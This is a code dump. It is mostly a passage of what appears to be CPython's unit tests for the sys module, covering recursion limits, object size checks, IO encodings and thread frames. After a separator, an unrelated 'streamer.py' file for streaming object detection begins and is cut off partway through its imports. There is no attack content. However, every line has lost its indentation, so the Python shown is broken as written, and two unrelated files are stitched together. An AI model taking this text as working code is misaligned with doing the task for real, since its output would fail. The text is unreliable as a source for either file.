# mark". Otherwise, it may not be possible anymore to
# reset the overflowed flag to 0.
from _testcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
# formula extracted from _Py_RecursionLimitLowerWaterMark()
if limit > 200:
depth = limit - 50
else:
depth = limit * 3 // 4
set_recursion_limit_at_depth(depth, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RecursionError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
@unittest.skipUnless(hasattr(sys, 'thread_info'),
'Threading required for this test.')
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = "C"
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def test_c_locale_surrogateescape(self):
out = self.c_locale_get_error_handler(isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# have no any effect
out = self.c_locale_get_error_handler(encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
# Some sanity checks
with_pymalloc = sysconfig.get_config_var('WITH_PYMALLOC')
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.requires_type_collecting
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('4P')) # XXX check layout
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('nQ2P') + calcsize('2nP2n') + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize('2nP2n') + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('12P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2n15Pl4Pn9Pn11PIP'
if hasattr(sys, 'getcounts'):
fmt += '3n2P'
s = vsize(fmt)
check(int, s)
s = vsize(fmt + # PyTypeObject
'3P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'4P')
# Separate block for PyDictKeysObject with 8 keys and 5 entries
s += calcsize("2nP2n") + 8 + 5*calcsize("n2P")
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P' + '2nP2n'))
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
streamer.py
|
'''
Our meta-detector Streamer
It converts a detector into a streaming perception system with a fixed output rate
'''
import argparse, json, pickle
from os.path import join, isfile, basename
from glob import glob
from time import perf_counter
import multiprocessing as mp
import traceback
from tqdm import tqdm
import numpy as np
import torch
from pycocotools.coco import COCO
# the line below is for running in both the current directory
# and the repo's root directory
import sys; sys.path.insert(0, '..'); sys.path.insert(0, '.')
from util import mkdir2, print_stats
from util.bbox import ltrb2ltwh_, ltwh2ltrb_
from util.runtime_dist import dist_from_dict
from det import imread, parse_det_result
from det.det_apis import init_detector, inference_detector
from track import track_based_shuffle
# from track import iou_assoc
from track.iou_assoc_cp import iou_assoc
from forecast import extrap_clean_up
from forecast.pps_forecast_kf import \
bbox2z, bbox2x, x2bbox, make_F, make_Q, \
